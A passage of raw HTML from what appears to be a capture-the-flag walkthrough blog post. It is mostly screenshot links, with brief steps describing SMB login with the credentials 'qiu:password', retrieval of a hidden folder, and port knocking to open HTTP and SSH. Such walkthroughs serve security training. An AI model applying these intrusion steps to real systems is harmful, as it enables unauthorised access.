href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjINJQWDyGAAl8MUDob4UmXhsEIHckGG1CIl0HHs-zXZFKdMi-64ZlScKz6K7bNP68jAIagJZhbGz5tle9eKkgtnwHJ-cQQrmDh6ePapfkXf1lh-LML_CiYujG0AE6aG1Jk5qFumPrd7XuS/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;27&quot; data-original-width=&quot;251&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjINJQWDyGAAl8MUDob4UmXhsEIHckGG1CIl0HHs-zXZFKdMi-64ZlScKz6K7bNP68jAIagJZhbGz5tle9eKkgtnwHJ-cQQrmDh6ePapfkXf1lh-LML_CiYujG0AE6aG1Jk5qFumPrd7XuS/s16000/screenshot.13.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Trying credentials &lt;b&gt;qiu:password &lt;/b&gt;to access the SMB server we are successful:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9ZxHAtDH5_NujmtZeYXwvORKNOuoMbfKIkurDKGL8hQcLHaK7nZzvig2Gai2p4aYBTlHsqcdF4SA2xSrmqpXBiU1ioLpBE-Mfx8JdVToS-a8muzQL5rjE0GCkeaA_KyKqWqlkzhDi6Dal/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;118&quot; data-original-width=&quot;518&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9ZxHAtDH5_NujmtZeYXwvORKNOuoMbfKIkurDKGL8hQcLHaK7nZzvig2Gai2p4aYBTlHsqcdF4SA2xSrmqpXBiU1ioLpBE-Mfx8JdVToS-a8muzQL5rjE0GCkeaA_KyKqWqlkzhDi6Dal/s16000/screenshot.15.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Examining content:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdTwwlLoMJt997NnguDDY5ywoy99-6Tiz_7UMoTl228pIwbECMF0SXvhsQSmlUmqD0U79vSuEsDOfa8i42r3KGjRbp55LypnnHbdf5iwt7U0XD1f-unFUB5y15UeINFIbW1WCas-r7ulj/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;368&quot; data-original-width=&quot;828&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdTwwlLoMJt997NnguDDY5ywoy99-6Tiz_7UMoTl228pIwbECMF0SXvhsQSmlUmqD0U79vSuEsDOfa8i42r3KGjRbp55LypnnHbdf5iwt7U0XD1f-unFUB5y15UeINFIbW1WCas-r7ulj/s16000/screenshot.16.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- After downloading content and not finding anything of great interest, we go to folder&lt;b&gt; .private &lt;/b&gt;and download its content:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTR8QzlFPuR67cZ9ZN7hhXWyj6jLzxTy2DfVYl9bskODsMJrdtN1FeY9MAlA39cZUrRJchyphenhyphen4m7I4tP06p4n7vAeOqDaYT9KtgobsyQ7zcO_uM-Zt9Rd3lceBFgFNJJi6lt872KPKuH1rTT/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;170&quot; data-original-width=&quot;469&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTR8QzlFPuR67cZ9ZN7hhXWyj6jLzxTy2DfVYl9bskODsMJrdtN1FeY9MAlA39cZUrRJchyphenhyphen4m7I4tP06p4n7vAeOqDaYT9KtgobsyQ7zcO_uM-Zt9Rd3lceBFgFNJJi6lt872KPKuH1rTT/s16000/screenshot.18.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq7FnBt7CFTNuJGQOdX_gxRzgxLMvzFv7QgU64-LeYz_6XN-EsIlAw0lCLKvbVbuXnKy0vIgH7TkzP28MnwmmxtLRSiqTZrHjJMcTeGUuPk-WKUDOspNnp9oivs5c4zyDdTO77DFAJjRdn/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;556&quot; data-original-width=&quot;842&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq7FnBt7CFTNuJGQOdX_gxRzgxLMvzFv7QgU64-LeYz_6XN-EsIlAw0lCLKvbVbuXnKy0vIgH7TkzP28MnwmmxtLRSiqTZrHjJMcTeGUuPk-WKUDOspNnp9oivs5c4zyDdTO77DFAJjRdn/s16000/screenshot.19.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxfq2Nq0NEGY_vJflDPH9CqfwAumN4XmrzsjupOMJScs3kSqkfX8Kpo4z7TX0v5Zt8OYMV3C8wruRRIdoiTZxnKe-kK-UJ1Xv3KzzRAkCeMmfaj-p7_IgILFKzXwN_V30iOZN5-mCt6hun/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;71&quot; data-original-width=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxfq2Nq0NEGY_vJflDPH9CqfwAumN4XmrzsjupOMJScs3kSqkfX8Kpo4z7TX0v5Zt8OYMV3C8wruRRIdoiTZxnKe-kK-UJ1Xv3KzzRAkCeMmfaj-p7_IgILFKzXwN_V30iOZN5-mCt6hun/s16000/screenshot.20.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading the 3 files:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2lunUzY6URiHK8b89uKsE3225e1ElcFikh2P2ES-A8Ce0oWbjd2Zf4cDsNCpyBz1qfM-aIQtlAMeiWhyYMeTtk6hr0LgS364BA0n3TlXsX_UfaPwikw4vQeqUuFfWeyS9OALosSTM3ZxM/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;554&quot; data-original-width=&quot;1031&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2lunUzY6URiHK8b89uKsE3225e1ElcFikh2P2ES-A8Ce0oWbjd2Zf4cDsNCpyBz1qfM-aIQtlAMeiWhyYMeTtk6hr0LgS364BA0n3TlXsX_UfaPwikw4vQeqUuFfWeyS9OALosSTM3ZxM/s16000/screenshot.21.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5AjLIUX673d8qD10EV8rgBskU7m3kT689D3nJM2PiCxKedU53KkrCz1navEuSDzNlSreAMGnSMtjGgrgOAOsKmO5nKhmkyhcu-O5ZOCKeC9FyM0TivuDSUKQNtwOtYIdCogd8x5233mVk/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;749&quot; data-original-width=&quot;934&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5AjLIUX673d8qD10EV8rgBskU7m3kT689D3nJM2PiCxKedU53KkrCz1navEuSDzNlSreAMGnSMtjGgrgOAOsKmO5nKhmkyhcu-O5ZOCKeC9FyM0TivuDSUKQNtwOtYIdCogd8x5233mVk/s16000/screenshot.22.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- So we can read references to &lt;b&gt;Port Knocking Daemon Configuration&lt;/b&gt; and sequences of numbers to open ports both 80 and 22:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPTeDGQBuX1JNJ8C1oouNBjFmavDt04gvyOUqJ9SbrwLWSH-6aMV8iK6qlEjlr_MMNRyoTgPGjtAkpPuNa81qM8GznOt4PmZCf5fNBReWFA0BVidPgnz3SyvXD1PuI854WijuvEAc4nvD9/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;54&quot; data-original-width=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPTeDGQBuX1JNJ8C1oouNBjFmavDt04gvyOUqJ9SbrwLWSH-6aMV8iK6qlEjlr_MMNRyoTgPGjtAkpPuNa81qM8GznOt4PmZCf5fNBReWFA0BVidPgnz3SyvXD1PuI854WijuvEAc4nvD9/s16000/screenshot.23.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgugAbShHG-4TemLN9q1qW4FiMBw5L4FcGHyIJzCquY1s9wafrJN3ilDLMGw-xerqHzV5qQohKwutGs5FsMVGs8epZk9A0xv-6-S5cip4GC1xp2tJMNmMyXvTvOi6Svuwh94-7sBSO1JZup/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;57&quot; data-original-width=&quot;433&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgugAbShHG-4TemLN9q1qW4FiMBw5L4FcGHyIJzCquY1s9wafrJN3ilDLMGw-xerqHzV5qQohKwutGs5FsMVGs8epZk9A0xv-6-S5cip4GC1xp2tJMNmMyXvTvOi6Svuwh94-7sBSO1JZup/s16000/screenshot.24.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Using command &lt;b&gt;knock&lt;/b&gt; to open services HTTP and SSH:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEnEZbHMN5Vc-MAw66bogznTt7f5QpcjGEN-zFcK6rNykPcllF_IYSx2TdI788VlpAPsVxegeP-BbOUXwhn8DKYLPSDjcLohZ_TO_lM2PU6KuJIQPc3ZJ33dHGcBSZWU-GcmVCls-RBTCj/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;264&quot; data-original-width=&quot;746&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEnEZbHMN5Vc-MAw66bogznTt7f5QpcjGEN-zFcK6rNykPcllF_IYSx2TdI788VlpAPsVxegeP-BbOUXwhn8DKYLPSDjcLohZ_TO_lM2PU6KuJIQPc3ZJ33dHGcBSZWU-GcmVCls-RBTCj/s16000/screenshot.25.jpg&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij67UT60R9ytW6fTTusvDTsn5wiZcsEdScDOIX28aXx8E7N7D6DhyphenhyphenGLoxDTFiq_N4ufjCs-fvxibmM3HsQT_1D259FYqQ7zfWCAxrNXegtWrz32qne9sKDhnUNcH9EjRRe-I6MwCdB1rjU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;336&quot; data-original-width=&quot;734&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEij67UT60R9ytW6fTTusvDTsn5wiZcsEdScDOIX28aXx8E7N7D6DhyphenhyphenGLoxDTFiq_N4ufjCs-fvxibmM3HsQT_1D259FYqQ7zfWCAxrNXegtWrz32qne9sKDhnUNcH9EjRRe-I6MwCdB1rjU/s16000/screenshot.26.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj37iqlE9UH-8WqHgnnGksWeouWpbCTHgF3FtqUpa3XEOht0h136rlayMDMpgJ_5BPGXNL7qilk_zgDvY9mK40B90pJ7tuyFpqgBqZY98T7fDd722ytOmitEoerh8bv2PQvh63nJ6G00JBU/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;379&quot; data-original-width=&quot;773&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj37iqlE9UH-8WqHgnnGksWeouWpbCTHgF3FtqUpa3XEOht0h136rlayMDMpgJ_5BPGXNL7qilk_zgDvY9mK40B90pJ7tuyFpqgBqZY98T7fDd722ytOmitEoerh8bv2PQvh63nJ6G00JBU/s16000/screenshot.27.jpg&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br 